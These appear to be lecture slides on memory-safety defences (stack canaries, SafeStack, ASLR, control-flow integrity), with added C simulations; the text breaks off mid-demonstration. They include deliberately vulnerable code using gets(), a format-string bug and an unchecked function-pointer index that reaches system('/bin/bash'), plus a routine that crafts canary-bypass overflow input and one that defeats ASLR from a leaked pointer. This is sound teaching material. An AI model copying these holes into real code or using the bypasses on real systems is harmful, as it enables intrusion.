![Page 243: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/243.jpg)
Zero-Days for Piracy www.tugraz.at
• Jailbreaks (e.g., getting root) on various devices:
• iOS (multiple exploits)
• Wii (buffer overflow in The Legend of Zelda: Twilight
Princess).
• PS2 (buffer overflow in the BIOS)
• PS3 (heap overflow)
• Xbox (buffer overflow in savegames)
54 Michael Schwarz — www.iaik.tugraz.at
![Page 244: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/244.jpg)
Bug Bounty Programs (BP)
55 Michael Schwarz — www.iaik.tugraz.at
Zero-Days in Government
• Computer and network surveillance
• Sometimes use state-sponsored trojan horses (govware)
• Bundestrojaner (Germany)
• MiniPanzer and MegaPanzer (Switzerland)
• “Sicherheitspaket” (Austria)
• NSA Exploits (Shadow Broker Leak)
56 Michael Schwarz — www.iaik.tugraz.at
Blue Team aka Defenses
We want to defend against attacks
• Defense in CS is surprisingly hard
• In “classical war games”, there is the 3:1 rule
→ An attacker needs 3 times as many soldiers as the defender
• Not a law (there are many exceptions) but a rule of thumb
57 Michael Schwarz — www.iaik.tugraz.at
The defender has a disadvantage
• In CS, the defender has a disadvantage
• Attacker: find one vulnerability
• Defender: protect against all possible attacks
• If the defender misses one vulnerability, the attacker wins
• “The best defense is a good offense” does not work
58 Michael Schwarz — www.iaik.tugraz.at
What do we do in CS?
• Mainly two strategies
• Strategy #1: Red Team finds all bugs → Blue Team fixes them
• Strategy #2: Find generic mechanisms → Red Team cannot exploit the program
59 Michael Schwarz — www.iaik.tugraz.at
Strategy #1: Exploit. Fix. Feel Safe. Repeat
• Often, Strategy #1 is used → seems simple (and cheap)
• If a bug is discovered, fix it, done
• “It took an attacker/researcher more than n months to find a bug, so the cost of finding the next bug is ≥ n months”
60 Michael Schwarz — www.iaik.tugraz.at
Re-cap: Weird machines
• We defined exploitation as a three-step procedure
1. Setup: choose a sane state which “allows” getting to a weird state
2. Instantiation: transition from the sane state to the weird state
3. Programming: program the weird machine
• The fix prevents one weird machine (or its “program”)
• Similar bugs → similar weird machines
61 Michael Schwarz — www.iaik.tugraz.at
Strategy #1: Exploit. Fix. Feel Safe. Repeat
• If an attacker found one bug, there might be other similar bugs
• A lot easier to find and exploit similar bugs
• True until there are no similar bugs anymore
62 Michael Schwarz — www.iaik.tugraz.at
Strategy #1: Exploit. Fix. Feel Safe. Repeat
63 Michael Schwarz — www.iaik.tugraz.at
Strategy #2: The Academic Way
• Better: a defense killing a whole class of bugs, e.g. buffer overflows
• Can be extremely hard → not easy to find bug-free programs
• We already win if we prevent exploitation
• And we have a solid definition of exploitation
64 Michael Schwarz — www.iaik.tugraz.at
Strategy #2: The Academic Way
• Prevent one step of exploitation
• Cannot prevent the Setup step → every transition is sane and the state is defined
• Try to prevent the Instantiation and Programming steps
• Start with the Instantiation step
• We again use the Simple Password Manager as an example
65 Michael Schwarz — www.iaik.tugraz.at
An Example
[Flowchart: Read PIN → PIN correct? → Yes: Show password list / No: Error message]

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

uint32_t readPIN() {
    char buffer[16];
    printf("Enter PIN:\n");
    gets(buffer);           /* bug 1: unbounded read into a 16-byte stack buffer */
    if(getenv("DEBUG"))
        printf(buffer);     /* bug 2: user input used as the format string */
    return atoi(buffer);
}
66 Michael Schwarz — www.iaik.tugraz.at
An Example
• We assume that the Red Team did not find the bugs (yet)
• We don’t know about the gets and printf bugs
• The problem the Blue Team has when defending:
• The Blue Team has to roughly know about possible attacks
• Protecting against a (yet) unknown attack is often not possible or comes with great costs (e.g. performance overhead)
• Assume we know about stack-buffer overflows
67 Michael Schwarz — www.iaik.tugraz.at
An Example www.tugraz.at
• Want to prevent Instantiation step
• Attacker should not get into weird state using a buffer overflow
• Program should rather die than being attacker controlled
• Remember: Stack-buffer overflow → overwrites the saved return address
• Cannot make it read-only: write permissions have page-level granularity, and the saved return address shares its page with writable local variables
![Page 299: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/299.jpg)
An Example www.tugraz.at
• Simple idea: put a known (random) value between the buffer
and the saved return address
• We call this value canary (yes, like the yellow bird)
• An overflow that runs from the buffer up to the return address has to overwrite the canary first
• On return, check whether the canary still has the correct value
• If not → buffer overflow detected, kill the program
![Page 304: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/304.jpg)
Overwriting the Stack (Canary) www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
Stack frame of readPIN as drawn on the slide (higher addresses at the top, one 32-bit word per row), before and after gets reads an overlong input made of the digits 0123456789 repeated; each word shows the little-endian value of four ASCII digits, e.g. "0123" = 0x33323130:

saved IP          ...          → 0x35343332 ("2345")
saved BP          ...          → 0x31303938 ("8901")
canary            0x01002236   → 0x37363534 ("4567")
buffer (top)      ...          → 0x33323130 ("0123")
buffer            ...          → 0x39383736 ("6789")
buffer            ...          → 0x35343332 ("2345")
buffer            ...          → 0x31303938 ("8901")
buffer            ...          → 0x37363534 ("4567")
buffer (start)    ...          → 0x33323130 ("0123")

Before return, check canary: 0x01002236 ≠ 0x37363534 → exit
![Page 310: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/310.jpg)
Trigger the Bug with Stack Canary www.tugraz.at
• Stack canaries are enabled by default in the gcc builds of most Linux distributions (usually -fstack-protector-strong)
• However, plain -fstack-protector only instruments functions with a character array of at least 8 bytes (--param ssp-buffer-size); -fstack-protector-strong extends this to any function with a local array or an address-taken local
• We can use -fstack-protector-all to instrument every function
% gcc pwdman.c -fstack-protector-all -o pwdman
% ./pwdman
Enter PIN:
012345678901234567890123456789
*** stack smashing detected ***: ./pwdman terminated
[1] 7569 abort (core dumped) ./pwdman
![Page 315: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/315.jpg)
We fixed a class of bugs www.tugraz.at
• We fixed the class of stack-buffer-overflow bugs
• The canary protects every stack buffer from being used to get into a “weird state”
![Page 318: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/318.jpg)
We fixed a class of bugs www.tugraz.at
• Simple stack-buffer overflow cannot get into an exploitable
weird state
• Leak canary using a different trick (e.g., printf bug, or
out-of-bounds read)
→ Only prevented a part of a class of bugs
• Still other ways to get into a weird state
• We want something more generic, even if less powerful
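The canary check from the slides above, and the reason a leaked canary defeats it, as an added example in C that is not part of the lecture material. It models the readPIN() frame as a struct (the member order, the canary value 0x01002236 taken from the diagram, the marker values for the saved base pointer and return address, the 16 filler bytes and the placeholder return address 0x41414141 are all assumptions of this model), replays an overlong PIN through a gets()-like copy, and applies the check the compiler inserts before the function returns. The third run feeds back the correct canary bytes, which is what an attacker does after reading them out through the printf(buffer) bug or an out-of-bounds read.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the readPIN() frame from the slides: the buffer sits
 * at the lowest address, the canary directly above it, then the saved base
 * pointer and the saved return address. The trailing region stands in for
 * the caller's frame. Real frames contain padding and compiler-chosen
 * ordering, so exact offsets differ from this model. */
struct frame {
    char buffer[16];
    uint32_t canary;
    uint32_t saved_bp;
    uint32_t saved_ip;
    char caller_frame[32];
};

/* Canary value taken from the slide's diagram. gcc-instrumented code instead
 * loads a per-process random value that glibc keeps in thread-local storage
 * (%fs:0x28 on x86-64). The other two are marker values for this model. */
#define CANARY_VALUE   0x01002236u
#define SAVED_BP_VALUE 0xBBBBBBBBu
#define SAVED_IP_VALUE 0xAAAAAAAAu

/* Stand-in for gets(): copies len input bytes plus a NUL starting at the
 * buffer, regardless of the buffer's 16-byte size. gets() stops only at a
 * newline, so embedded NUL bytes pass through. The cap at the end of the
 * modelled frame exists only to keep this demo within defined behaviour. */
static void gets_into_frame(struct frame *f, const char *input, size_t len) {
    char *dst = (char *)f;                 /* buffer is the first member */
    if (len > sizeof *f - 1) len = sizeof *f - 1;
    memcpy(dst, input, len);
    dst[len] = '\0';
}

/* The check the compiler inserts before ret: 1 if the canary is intact. */
static int canary_intact(const struct frame *f) {
    return f->canary == CANARY_VALUE;
}

/* Runs one input through the modelled frame. Returns 1 if the canary check
 * passes (the function would return normally) and 0 if it fails (real code
 * calls __stack_chk_fail, which prints "stack smashing detected" and aborts).
 * If out is non-NULL the resulting frame is copied there for inspection. */
int simulate_readpin(const char *input, size_t len, struct frame *out) {
    struct frame f;
    memset(&f, 0, sizeof f);
    f.canary   = CANARY_VALUE;
    f.saved_bp = SAVED_BP_VALUE;
    f.saved_ip = SAVED_IP_VALUE;
    gets_into_frame(&f, input, len);
    if (out) *out = f;
    return canary_intact(&f);
}

/* Builds the input an attacker sends once the canary has leaked: 16 filler
 * bytes, the correct canary, a filler saved base pointer, then the chosen
 * return address. fake_ip is a placeholder, not a real target. Returns the
 * input length (0 if dst is too small). */
size_t build_leaked_canary_input(char *dst, size_t cap,
                                 uint32_t canary, uint32_t fake_ip) {
    const uint32_t fake_bp = 0xDEADBEEFu;
    size_t len = 16 + 3 * sizeof(uint32_t);
    if (cap < len) return 0;
    memset(dst, 'A', 16);
    memcpy(dst + 16, &canary, sizeof canary);
    memcpy(dst + 20, &fake_bp, sizeof fake_bp);
    memcpy(dst + 24, &fake_ip, sizeof fake_ip);
    return len;
}

int main(void) {
    struct frame f;
    char attack[64];
    const char *longpin = "012345678901234567890123456789";
    size_t n;
    int ok;

    ok = simulate_readpin("1234", 4, &f);
    printf("short input:    canary %s\n", ok ? "intact" : "smashed");

    ok = simulate_readpin(longpin, strlen(longpin), &f);
    printf("overlong input: canary %s, canary word now 0x%08x\n",
           ok ? "intact" : "smashed", (unsigned)f.canary);

    n = build_leaked_canary_input(attack, sizeof attack, CANARY_VALUE, 0x41414141u);
    ok = simulate_readpin(attack, n, &f);
    printf("leaked canary:  canary %s, saved IP now 0x%08x\n",
           ok ? "intact" : "smashed", (unsigned)f.saved_ip);
    return 0;
}
```

Compile with gcc -std=c99 and run; the second run fails the check, the third passes it although the saved return address has been replaced. In a real binary the same check shows up in the disassembly of a protected function as a load from %fs:0x28 at entry and a compare followed by a call to __stack_chk_fail before ret. glibc also forces the first byte of the canary in memory to 0x00, so a strcpy-style overflow cannot write a leaked canary back; gets() stops only at a newline and is not hindered by that.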
![Page 323: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/323.jpg)
Any alternatives? www.tugraz.at
• Alternative to prevent the Instantiation step?
• Overwriting the saved instruction pointer on the stack → weird state
→ Separate saved return addresses and buffers
![Page 326: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/326.jpg)
An alternative: Safe Stack www.tugraz.at
• Simple idea: two different stacks, a safe stack and an unsafe stack
• Return addresses, spilled registers and scalar locals that are only accessed in a provably safe way go on the safe stack
• Buffers (arrays) and address-taken locals go on the unsafe stack
• Buffer overflows cannot overwrite the return address anymore
![Page 330: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/330.jpg)
Safe Stack www.tugraz.at
Layout as drawn on the slide (higher addresses 0x7FF... at the top, lower addresses 0x000... at the bottom); the normal stack is split into the two stacks:

Safe Stack (0x7FF... at the top, grows toward 0x000...)
  last frame:    saved return address, saved base pointer
  current frame: saved return address, saved base pointer
Unsafe Stack (0x7FF... at the top, grows toward 0x000...)
  last frame:    local variables
  current frame: local variables, ...
Normal Stack, for comparison (0x7FF... at the top, grows toward 0x000...)
  last frame:    saved return address, saved base pointer, local variables
  current frame: saved return address, saved base pointer, local variables, ...
![Page 334: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/334.jpg)
Trigger the Bug with Safe Stack www.tugraz.at
• clang supports safe stacks with the compile flag -fsanitize=safe-stack (not yet implemented in gcc)
• The overlong input now only corrupts data on the unsafe stack; the return address on the safe stack stays intact, so the program neither crashes nor aborts but simply reports a wrong PIN
% clang pwdman.c -fsanitize=safe-stack -o pwdman
% ./pwdman
Enter PIN:
1234
Wrong PIN!
Enter PIN:
0123456789012345678901234567890123456789
Wrong PIN!
Enter PIN:
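A hand-written model of the split described on the Safe Stack slides, as an added example in C; it is neither clang's implementation nor the lecture's code. A small bump allocator over a static array plays the unsafe stack (the real one is a separate mapping per thread whose top is kept in thread-local storage), readPIN's 16-byte buffer is taken from it, and the saved base pointer and return address stay in a struct on the normal stack. The 16-byte caller buffer placed next to readPIN's buffer and the marker values are assumptions of the model; they show the limit of the approach: an overflow no longer reaches the return address, but it still corrupts whatever else lives on the unsafe stack.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of what clang's -fsanitize=safe-stack does automatically:
 * control data stays on the normal ("safe") stack, buffers an overflow could
 * run out of are moved to a separate region, the unsafe stack. */

/* The unsafe stack: a separate region, here a static array that grows
 * downward like a normal stack. The real implementation uses a dedicated
 * mapping per thread and keeps its top in thread-local storage. */
#define UNSAFE_STACK_SIZE 256
static char   unsafe_stack[UNSAFE_STACK_SIZE];
static size_t unsafe_top = UNSAFE_STACK_SIZE;

static char *unsafe_alloc(size_t n) {
    if (n > unsafe_top) return NULL;        /* out of unsafe-stack space */
    unsafe_top -= n;
    return unsafe_stack + unsafe_top;
}
static void unsafe_free(size_t n) { unsafe_top += n; }

/* What is left of readPIN's frame on the safe stack: no buffer at all.
 * The values are markers for this model. */
struct safe_frame {
    uint32_t saved_bp;
    uint32_t saved_ip;
};
#define SAVED_BP_VALUE 0xBBBBBBBBu
#define SAVED_IP_VALUE 0xAAAAAAAAu

/* Stand-in for gets(): copies len bytes plus a NUL into buffer with no regard
 * for its size. The only cap is the end of the unsafe-stack region, so that
 * the demo stays within defined behaviour. */
static void gets_into(char *buffer, const char *input, size_t len) {
    size_t room = (size_t)(unsafe_stack + UNSAFE_STACK_SIZE - buffer);
    if (len > room - 1) len = room - 1;
    memcpy(buffer, input, len);
    buffer[len] = '\0';
}

struct pin_result {
    uint32_t pin;                 /* what strtoul made of the input */
    int      saved_ip_intact;     /* 1: the safe-stack frame survived */
    int      neighbour_clobbered; /* 1: other unsafe-stack data was overwritten */
};

/* readPIN() with char buffer[16] relocated to the unsafe stack. A 16-byte
 * buffer belonging to the caller sits just above it: SafeStack protects
 * control data only, so an overflow still corrupts that neighbour. */
struct pin_result readpin_safestack(const char *input, size_t len) {
    static const char caller_data[] = "caller-data-----";   /* 16 bytes */
    struct safe_frame frame = { SAVED_BP_VALUE, SAVED_IP_VALUE };
    struct pin_result r;

    char *caller_buf = unsafe_alloc(16);    /* allocated first: higher address */
    char *buffer     = unsafe_alloc(16);    /* readPIN's own buffer, below it */
    if (!caller_buf || !buffer) abort();    /* cannot happen with 256 bytes */
    memcpy(caller_buf, caller_data, 16);

    gets_into(buffer, input, len);
    r.pin = (uint32_t)strtoul(buffer, NULL, 10);
    r.saved_ip_intact = (frame.saved_ip == SAVED_IP_VALUE &&
                         frame.saved_bp == SAVED_BP_VALUE);
    r.neighbour_clobbered = memcmp(caller_buf, caller_data, 16) != 0;

    unsafe_free(32);
    return r;
}

int main(void) {
    const char *inputs[] = { "1234",
                             "0123456789012345678901234567890123456789" };
    for (size_t i = 0; i < 2; i++) {
        struct pin_result r = readpin_safestack(inputs[i], strlen(inputs[i]));
        printf("input %-40s pin=%lu, return address %s, neighbour %s\n",
               inputs[i], (unsigned long)r.pin,
               r.saved_ip_intact ? "intact" : "overwritten",
               r.neighbour_clobbered ? "clobbered" : "untouched");
    }
    return 0;
}
```

Compile with gcc -std=c99 and run: the 40-digit input leaves the return address untouched, exactly the behaviour seen in the pwdman run above, but overwrites the caller's buffer on the unsafe stack. To see the real thing, compile pwdman.c with clang -fsanitize=safe-stack and compare the disassembly: readPIN's buffer is no longer addressed relative to the stack pointer but through the unsafe-stack pointer loaded from thread-local storage.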
![Page 338: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/338.jpg)
Think bigger! www.tugraz.at
• Until now, we only prevented a small class of bugs
• It looks like a cat-and-mouse game
• It works and adds protection, but we have to combine a lot of
countermeasures if we continue that way
• Every countermeasure costs something (performance, memory, ...)
• We want something more generic, even if it is not as powerful as specific countermeasures
![Page 343: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/343.jpg)
It’s all about randomness
• Randomness is often used in security → probabilistic approach
• Assumption: attacker can jump to any memory location
• What if all memory locations are unpredictable?
• Attacker cannot reliably jump to a specific location anymore
![Page 347: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/347.jpg)
Address Space Layout Randomization (ASLR)
• Address Space Layout Randomization (ASLR) randomizes the position of program parts
[Figure: user address space from 0 to 2^47, laid out as code, data, bss, heap, shared memory, shared libraries and stack; ASLR randomizes where each of these regions is placed]
• Attacker cannot predict the location of a sane or injected state
• Powerful on 64-bit systems → huge address space (128 TB)
![Page 352: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/352.jpg)
ASLR and its benefits
• ASLR is only a probabilistic countermeasure relying on two assumptions
• No leak of addresses → a single leaked pointer breaks ASLR immediately
• Randomization range is large enough → otherwise brute force breaks ASLR
• On 64-bit systems, ASLR makes exploitation really hard
• Advantage of ASLR: it costs nearly nothing → widespread use
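What the two assumptions mean in practice, shown as an added example that is not code from the lecture: ASLR moves a module as a whole, so every offset inside it stays fixed, and an attacker who leaks one code pointer can compute every other address in that module. The offset table below is built from the running binary itself, which is exactly what an attacker does offline with a copy of the target; the "leaked" pointer stands in for a value read out through an information-leak bug. The two brute-force helpers quantify the second assumption for a process that re-randomizes on every attempt (re-executed after a crash) versus one that keeps one layout (a forking server). The function and type names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Two functions in the same module; their distance is fixed at link time
 * and ASLR cannot change it. */
__attribute__((noinline)) int victim_handler(int x) { return x + 1; }
__attribute__((noinline)) int sensitive_routine(int x) { return x * 2; }

/* "Offline" knowledge: relative offsets within the module. An attacker reads
 * these from the binary on disk; computing them in-process gives the same
 * values because ASLR only shifts the base. */
typedef struct {
    intptr_t handler_to_sensitive;   /* &sensitive_routine - &victim_handler */
} offset_table;

offset_table build_offset_table(void) {
    offset_table t;
    t.handler_to_sensitive = (intptr_t)(uintptr_t)&sensitive_routine
                           - (intptr_t)(uintptr_t)&victim_handler;
    return t;
}

/* Attacker side: given ONE leaked pointer plus the offset table, compute the
 * address of a function that was never leaked. */
uintptr_t rebase_from_leak(uintptr_t leaked_handler, const offset_table *t) {
    return (uintptr_t)((intptr_t)leaked_handler + t->handler_to_sensitive);
}

/* Returns 1 if the rebased pointer really is sensitive_routine (the leak
 * defeated ASLR for this module), 0 otherwise. */
int leak_defeats_aslr(void) {
    offset_table t = build_offset_table();
    uintptr_t leak = (uintptr_t)&victim_handler;   /* the "leaked" value */
    uintptr_t guess = rebase_from_leak(leak, &t);
    int (*fn)(int) = (int (*)(int))guess;
    return guess == (uintptr_t)&sensitive_routine && fn(21) == 42;
}

/* Brute force with `bits` bits of randomization. Fresh layout per attempt:
 * geometric, on average 2^bits attempts. Fixed layout (forking server keeps
 * the parent's layout): enumerate without repetition, (2^bits + 1) / 2.
 * Linux defaults for the mmap base: 8 bits on 32-bit x86, 28 on x86-64. */
double expected_attempts_fresh_layout(unsigned bits) {
    if (bits >= 64) return -1.0;               /* outside the modeled range */
    return (double)((uint64_t)1 << bits);
}
double expected_attempts_fixed_layout(unsigned bits) {
    if (bits >= 64) return -1.0;
    return ((double)((uint64_t)1 << bits) + 1.0) / 2.0;
}

int main(void) {
    int stack_probe = 0;
    int *heap = malloc(sizeof *heap);
    /* Run twice: with ASLR on and a PIE build, all four lines change. */
    printf("code  %#lx\n", (unsigned long)(uintptr_t)&victim_handler);
    printf("stack %#lx\n", (unsigned long)(uintptr_t)&stack_probe);
    printf("heap  %#lx\n", (unsigned long)(uintptr_t)heap);
    printf("libc  %#lx\n", (unsigned long)(uintptr_t)&printf);
    printf("one leak defeats ASLR for this module: %s\n",
           leak_defeats_aslr() ? "yes" : "no");
    printf("expected attempts, 8 bits: fresh %.0f, fixed %.1f\n",
           expected_attempts_fresh_layout(8), expected_attempts_fixed_layout(8));
    printf("expected attempts, 28 bits: fresh %.0f, fixed %.1f\n",
           expected_attempts_fresh_layout(28), expected_attempts_fixed_layout(28));
    free(heap);
    return 0;
}
```

If the addresses do not change between runs, check the two prerequisites: `cat /proc/sys/kernel/randomize_va_space` must be 2 (full randomization), and `readelf -h ./a.out` must report Type DYN, i.e. a PIE; a non-PIE executable keeps its code, data and bss at fixed addresses no matter what the kernel does.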
![Page 357: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/357.jpg)
ASLR in the real world
• As ASLR is a cheap but nevertheless effective countermeasure, it is widely used
• Linux since 2005 (since 2014 in the kernel)
• Windows since 2007
• Android and iOS since 2011
• Mac OS since 2011 (since 2012 in the kernel)
• Prevented many single-bug exploits, as they fail with a high probability
![Page 360: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/360.jpg)
Preventing the Programming step
• Assumption: attacker still found a way to get into a weird state
• Last resort to prevent exploitation → make the Programming step infeasible
• Attacker uses the input stream to program the weird machine
• We could filter the input stream – but this is not always possible
![Page 364: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/364.jpg)
Self awareness
• Idea: make the FSM aware of itself!
• The FSM should know which states and transitions are allowed
→ Prevent all transitions which are not in the original FSM
• Every state has to check whether
• the target of an indirect jump is correct according to the FSM
• the saved return address points to a previous state
• Forces the program to stay inside the FSM
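The second check on the slide, that the saved return address still points to a previous state, is what a shadow stack implements (in hardware as Intel CET shadow stacks, in software as clang's `-fsanitize=shadow-call-stack`). The following is an added illustration, not code from the lecture: a protected function records its own return address in a separate shadow stack when it is entered and, right before returning, verifies that the return address it is about to use is the one it recorded. The macro and function names are this example's own; `__builtin_return_address` is a GCC/clang builtin.

```c
#include <stdio.h>
#include <stdlib.h>

#define SHADOW_CAPACITY 256

/* Shadow stack: lives apart from the ordinary stack, so an overflow of a local
 * array cannot reach it. A real implementation keeps it in memory the attacker
 * cannot write at all (a separate, protected mapping or a dedicated register). */
static const void *shadow_stack[SHADOW_CAPACITY];
static int shadow_depth = 0;
static int shadow_violations = 0;

int shadow_push(const void *return_addr) {
    if (shadow_depth >= SHADOW_CAPACITY) return -1;
    shadow_stack[shadow_depth++] = return_addr;
    return 0;
}

/* Pop the recorded return address and compare it with the one the function is
 * actually about to return to. Returns 0 on match, -1 on a violation
 * (mismatch or underflow, i.e. a return that was never entered). */
int shadow_check_pop(const void *return_addr) {
    if (shadow_depth == 0) { shadow_violations++; return -1; }
    const void *expected = shadow_stack[--shadow_depth];
    if (expected != return_addr) { shadow_violations++; return -1; }
    return 0;
}

int shadow_stack_depth(void) { return shadow_depth; }
int shadow_violation_count(void) { return shadow_violations; }

/* Instrumentation a compiler would insert into every protected function:
 * record on entry, verify on every return path, abort on violation. */
#define CFI_PROLOGUE() \
    do { if (shadow_push(__builtin_return_address(0)) != 0) abort(); } while (0)
#define CFI_RETURN(value) \
    do { if (shadow_check_pop(__builtin_return_address(0)) != 0) abort(); \
         return (value); } while (0)

/* A protected function: the return address seen in the prologue must equal
 * the one used at the return site, otherwise the saved slot was overwritten. */
__attribute__((noinline)) int protected_sum(const int *values, int n) {
    CFI_PROLOGUE();
    int sum = 0;
    for (int i = 0; i < n; i++) sum += values[i];
    CFI_RETURN(sum);
}

/* Constructed input for the demo: sums to 10. */
int protected_sum_demo(void) {
    int data[] = {1, 2, 3, 4};
    return protected_sum(data, 4);
}

/* Models the check when an overflow has replaced the saved return address:
 * the prologue recorded `genuine_site`, the epilogue sees `tampered_site`.
 * Returns -1, i.e. the violation is detected before the ret executes. */
int simulate_tampered_return(void) {
    static const char genuine_site[1], tampered_site[1];   /* two distinct addresses */
    shadow_push(genuine_site);
    return shadow_check_pop(tampered_site);
}

int main(void) {
    printf("protected_sum = %d (shadow depth after return: %d)\n",
           protected_sum_demo(), shadow_stack_depth());
    printf("tampered return detected: %s\n",
           simulate_tampered_return() == -1 ? "yes" : "no");
    return 0;
}
```

The forward-edge half of the slide, checking the target of an indirect call, needs a different structure: a set of permitted targets per call site rather than a stack, because a call may legitimately go to several functions while a return has exactly one valid destination.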
![Page 371: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/371.jpg)
Allowed and Disallowed transitions
[Figure: the password manager FSM (Read PIN → PIN correct? → Yes: Show password list, No: Error message). Transitions that exist in the original FSM are marked allowed (✓); every other edge between the states is marked disallowed (✗) and must be rejected by the self-aware FSM.]
![Page 372: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/372.jpg)
Control-flow integrity
• Control-flow integrity sounds simple → difficult to implement
• Control-flow graph must be correctly constructed
• Function pointers cannot be protected precisely if the set of valid destinations is large
• Some functions (e.g., library functions) have many call locations and therefore many valid return locations
• Still, usable implementations in clang (`-fsanitize=cfi`) and from Microsoft (Control Flow Guard)
• Exploitation is still possible → integrity checks are often coarse-grained
![Page 378: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/378.jpg)
Control-flow integrity - Example

```c
#include <stdio.h>
#include <stdlib.h>

typedef void (*function)();

/* Stand-in for the password manager's unlock routine, which the slide does
 * not show; it only reproduces the "Enter PIN:" prompt seen in the output. */
void unlockPasswordManager() {
  char pin[32];
  printf("Enter PIN: ");
  fflush(stdout);
  if (fgets(pin, sizeof(pin), stdin) == NULL) exit(1);
}

void help() {
  printf("Display this help message\n");
}
void unlock() {
  unlockPasswordManager();
}
void quit() {
  printf("Bye!\n");
  exit(0);
}
void usage() {
  printf("Usage: pwdman-ui <0-2>\n");
}
void debug() {
  printf("Here is your shell\n");
  system("/bin/bash");
}
int main(int argc, char* argv[]) {
  function commands[] = {
    help, unlock, quit
  };
  /* Leftover debugging command, never meant to be reachable from the UI.
   * Compiled without optimization, clang places this array directly below
   * commands[] on the stack. */
  function debugging[] = {
    debug
  };
  if(argc > 1) {
    /* Deliberately unchecked index: any value outside 0..2 reads a function
     * pointer from outside commands[] and calls it. Index 10 hits garbage
     * (segmentation fault); index -1 hits debugging[0], which is debug. */
    commands[atoi(argv[1])]();
  } else usage();
}
```
![Page 379: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/379.jpg)
Control-flow integrity - Example

```console
% clang pwdman-ui.c -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 1
Enter PIN: ^C
% ./pwdman-ui 2
Bye!
% ./pwdman-ui 10
